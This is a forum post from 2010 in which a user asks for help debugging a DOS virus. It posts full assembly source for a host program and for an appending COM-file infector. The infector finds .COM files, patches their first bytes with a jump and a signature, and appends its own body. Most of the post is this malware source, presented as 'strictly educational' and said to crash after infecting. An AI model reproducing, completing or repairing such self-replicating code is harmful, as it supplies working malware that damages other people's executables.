|
-
October 3rd, 2010, 01:06 PM
#1
Infecting COM problem
Its strictly educational and i mean no harm.
The theory is as usual
1. find first file
2. read first four bytes
3. store it
4. replace with 3 byte jump code and a virus signature
5. go to 100h
now the infected com seems not be working although it is printing the virus's hello world string, its crashing after that.
the host file...
Code:
c_seg segment 'code'
org 100h
assume cs:c_seg, ds:c_seg, es:c_seg
main proc near
start:
mov ah, 02h
mov dl, 'Z'
int 21h
mov ah, 4ch
int 21h
main endp
c_seg ends
end start
This is the virus
Code:
c_seg segment 'code'
org 100h
assume cs:c_seg
main proc far
start_:
mov ax, cs
mov ds, ax
mov es, ax
call fals_proc
fals_proc proc
fals_proc endp
pop bp
sub bp, offset fals_proc
; set DTA
mov ah, 1Ah
lea dx, [bp + offset DTA]
int 21h
; find first file
mov ah, 4eh
lea dx, [bp + offset first_file]
mov cx, 7
int 21h
; preparing full path
lea di, [bp + offset file_name]
mov byte ptr[di], '.'
inc di
mov byte ptr[di], '\'
inc di
lea si, [bp + offset DTA + 1Eh]
rep movsb
mov byte ptr[di], 0
; open file
mov ah, 3Dh
mov al, 2
lea dx, [bp + offset file_name]
int 21h
; save handle
push ax
;push ax
pop bx
;pop [bp + fHandle]
; read first four bytes
mov ah, 3Fh
mov cx, 4
lea dx, [bp + offset buffer]
int 21h
;==debug==
;mov ah, 02h
;mov dl, byte ptr[bp + offset buffer + 3]
;int 21h
mov al, byte ptr[bp + offset buffer + 3]
mov dl, byte ptr [bp + offset vir_sig]
cmp al, dl
jne jmp_patchin_
mov ah, 3Eh
int 21h
mov ah, 4ch
int 21h
;==debug==
jmp_patchin_:
; set file pointer to begin
mov ax, 4200h
mov cx, 0
mov dx, 0
int 21h
; ===== the jump patch =====
mov byte ptr[bp + jmp_patch], 0E9h
mov ax, word ptr[bp + offset DTA + 1Ah] ; the file size
sub ax, 3
mov word ptr[bp + jmp_patch + 1], ax
mov al, vir_sig
mov byte ptr[bp + jmp_patch + 3], al
mov ah, 40h
mov cx, 4
lea dx, [bp + offset jmp_patch]
int 21h
; append the virus
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h
mov ah, 40h
mov cx, offset vir_sig - offset start_
lea dx, [bp + offset start_]
int 21h
; close
mov ah, 3Eh
int 21h
; restore
mov cx, 4
lea si, [bp + offset buffer]
mov di, 100h
rep movsb
mov ah, 09h
lea dx, [bp + offset infection]
int 21h
mov ax, 0100h
jmp ax
;quit_:
; mov ah, 4ch
; int 21h
DTA db 43 dup (?)
first_file db '.\*.COM', 0
file_name db 255 dup (?)
extra_buffer db 20 dup (?)
fHandle dw ?
buffer db 4 dup (?)
jmp_patch db 4 dup (?)
file_len db 2 dup (?)
virus_len dw ?
infection db "Hello World$"
vir_sig db 'Y'
main endp
c_seg ends
end start_
At a loss, some one plz help, thanx in advance. 
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|
Reply With Quote
